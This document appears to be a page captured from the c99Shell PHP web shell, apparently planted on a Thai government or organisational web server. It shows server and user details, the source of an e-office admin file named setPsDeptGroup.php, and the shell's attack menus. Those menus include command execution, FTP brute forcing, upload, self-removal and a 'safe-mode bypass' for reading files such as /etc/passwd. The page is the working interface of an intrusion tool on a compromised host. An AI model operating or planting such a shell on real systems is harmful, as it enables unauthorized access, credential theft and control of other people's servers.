!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     setPsDeptGroup.php (4.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once "template.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clspsdept.php";
include_once 
"getPrefix.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oPSd = new psdept($oC);
$oPSd2 = new psdept($oC);
$maxdocgroup=$oDP->SearchMaxDocGroup();
?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table  width="100%"  align="center">
<tr><td >
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="?mm=1">จัดการข้อมูลบุคลากรและโครงสร้าง</a>
     <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle">กำหนดผู้ใช้ทั่วไปในหน่วยงานรองแยกตามหน่วยงาน</font></legend><br>
        <form name="ff"  target="_blank">
        
        <table width="95%" align="center">
          
            <tr align="center">
            <td align="center" colspan="2">
                <table width="95%"  border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="silver">
                     <tr><td colspan="8" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_9"];?>" height="24"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>ข้อมูลบุคลากรในหน่วยงานหลักและรองทั้งหมด</b></font></td></tr>
                  <tr align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_9"];?>"> 
            <td width="5%" height="35" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>#</b></font></td>
            <td width="9%" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>
              คำนำหน้า<br>ชื่อ</b></font></td>
            <td width="21%" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>ชื่อ</b></font></td>      
            <td width="23%" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>นามสกุล</b></font></td>
              <td  width="21%" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>หน่วยงานรอง</b></font></td>
              <td  width="5%" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b>แก้ไข</b></font></td>
          </tr>
        <? 
                  $oDP
->SearchBydeptDateDocGroup($maxdocgroup);
                while(
$oDP->GetRecord()){
                    
$i=0;
        
?>
            <tr>
            <td colspan="8" height="22" bgcolor="#FFFFFF">&nbsp;&nbsp;<strong>หน่วยงานหลัก :: <? echo $oDP->deptName?></strong></td></tr>
        <?    
                    $oPS
->SearchByDeptId2($oDP->deptId);
                    while(
$oPS->GetRecord()){
            
?>
    
            <tr bgcolor=<? echo $GLOBALS["COLOR_BG_TD_11"]; ?>>
            <td align="center" bgcolor=<? echo $GLOBALS["COLOR_BG_TD_11"]; ?>><?  echo $i+1;?></td> 
            <td>&nbsp;<? echo GetPrefix($oPS->prefixId); ?></td>
            <td height="22" bgcolor=<? echo $GLOBALS["COLOR_BG_TD_11"]; ?>>&nbsp;<? echo $oPS->fName;  ?></td>
            <td>&nbsp;<? echo $oPS->lName;?></td>
            <td><?  $oPSd2->SearchBypersonIddeptIddocGroup($oPS->personId,$maxdocgroup);
                            while(
$oPSd2->GetRecord()){
                                    echo 
'&nbsp;-&nbsp;'.a2th($oPSd2->deptName).'<br>';
                            }
            
?></td>
            <td align="center"><a href="addSetPsDept.php?ps=<? echo $oPS->personId?>&name=<? echo $oPS->fName?>&showrepedit=1"><img src="../picture/textedit3.gif" border="0"></a></td>
            </tr>
            <? $i++;}
            }
?>
              </table>
            </td></tr>
            </table>
                 </form>
                 </fieldset> 
                          <table width="90%" border="0" align="center">
        <tr> 
          <td width="76"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp;<strong>หมายเหตุ 
            : </strong>&nbsp;</font></td>
          <td width="618"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกที่ <img src="../picture/textedit3.gif" border="0"> เพื่อแก้ไขข้อมูลผู้ใช้ทั่วไปในหน่วยงานรอง</font></td>
        </tr>
      </table>
        </td>
        </tr>
</table>
</body>
</html>
<script>
function printDetailFollowDocDept(p,q){ 
        FileName = "printRepFollowDocDeptDetail.php?DocID="+p+"&DrsID="+q;
            var w=600;  
            var h=600;
            strOption = "scrollbars=yes,left=300,top=100,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption);         
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0084 ]--